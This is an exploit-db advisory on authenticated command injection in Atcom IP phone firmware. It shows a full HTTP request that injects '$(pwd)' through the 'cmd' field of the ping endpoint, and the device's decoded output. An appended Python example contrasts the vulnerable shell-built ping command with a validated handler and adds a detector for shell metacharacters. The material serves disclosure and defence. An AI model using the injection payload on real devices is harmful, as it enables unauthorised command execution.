Atcom 2.7.x.x – Authenticated Command Injection

  • Author: Mohammed Adel
    Date: 2023-10-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51742/
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux
    
    
Exploit Request:

POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"

cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping


Response:

{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
    
The value of "ping_cmd_result" is base64-encoded. Decoding it reveals the output of the executed command: the "$(pwd)" in the "cmd" parameter was expanded by the shell, so the CGI's working directory was appended to the ping target:

ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
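The root cause shown above is a ping target that reaches a shell unvalidated. The following is an added example, not code from the advisory or from the vendor's firmware: it contrasts the unsafe string-building pattern with a hardened handler that validates the target as a bare IP address or hostname and runs ping as an argv list without a shell, and it adds a small detector that flags "cmd" values carrying shell metacharacters in captured request bodies, plus a decoder for the device's base64 "ping_cmd_result" field. All function names, the use of ping's -4/-6 flags and the log-line layout are assumptions; the request body and JSON response are the ones from the advisory.

```python
"""Vulnerable pattern vs. hardened ping handler, plus request-body detection.

Added example (hypothetical helper names); not the vendor's code.
"""
import base64
import ipaddress
import json
import re
import subprocess
from urllib.parse import parse_qs

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters overall.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Shell metacharacters that never belong in a ping target.
_SHELL_META_RE = re.compile(r"""[;&|`$(){}<>\\'"\s]""")

# Taken from the advisory: the injected body and the device's JSON reply.
ADVISORY_BODY = "cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping"
ADVISORY_RESPONSE = (
    '{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9s'
    'aWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}'
)


class PingTargetError(ValueError):
    """Raised when a ping target is not a plain IP address or hostname."""


def build_ping_shell_unsafe(target: str) -> str:
    """Vulnerable pattern (do not use): the user-supplied target is pasted into
    a command line that a shell will parse, so "$(...)" gets expanded."""
    return f"ping -c 1 {target}"


def validate_ping_target(target: str) -> str:
    """Return target unchanged if it is an IPv4/IPv6 address or a hostname;
    anything else, including a valid address with trailing junk, is rejected.
    Leading hyphens are rejected too, so a target cannot become a ping option."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise PingTargetError(f"rejected ping target: {target!r}")


def is_valid_ping_target(target: str) -> bool:
    """Boolean wrapper around validate_ping_target for callers and tests."""
    try:
        validate_ping_target(target)
        return True
    except PingTargetError:
        return False


def build_ping_argv(target: str, ipv6: bool = False) -> list[str]:
    """Hardened form: validated target, argv list, no shell involved.
    The -4/-6 flags follow iputils/busybox ping (assumption)."""
    return ["ping", "-6" if ipv6 else "-4", "-c", "1", validate_ping_target(target)]


def run_ping_hardened(target: str, ipv6: bool = False, timeout: float = 5.0) -> str:
    """Run the hardened argv and return base64 of the combined output,
    mirroring the device's "ping_cmd_result" format. Not run in tests."""
    proc = subprocess.run(build_ping_argv(target, ipv6), capture_output=True,
                          timeout=timeout, check=False)
    return base64.b64encode(proc.stdout + proc.stderr).decode()


def flag_suspicious_cmd_param(body: str) -> list[str]:
    """Detection: parse a form-encoded request body (as logged by a proxy or
    web server) and return every "cmd" value that carries shell metacharacters
    or fails target validation."""
    flagged = []
    for value in parse_qs(body, keep_blank_values=True).get("cmd", []):
        if _SHELL_META_RE.search(value) or not is_valid_ping_target(value):
            flagged.append(value)
    return flagged


def decode_ping_result(response_json: str) -> str:
    """Decode the base64 "ping_cmd_result" field of the device's JSON reply."""
    data = json.loads(response_json)
    return base64.b64decode(data["ping_cmd_result"]).decode("utf-8", errors="replace")


if __name__ == "__main__":
    print("unsafe command line:", build_ping_shell_unsafe("0.0.0.0$(pwd)"))
    print("flagged cmd values:", flag_suspicious_cmd_param(ADVISORY_BODY))
    print("hardened argv:", build_ping_argv("0.0.0.0"))
    print("decoded result:", decode_ping_result(ADVISORY_RESPONSE).strip())
```

The detector matches on the decoded parameter value, so URL-encoded forms of the same characters (for example "%24%28") are caught after parse_qs decodes them; validation in the handler, not the detector, is the actual control.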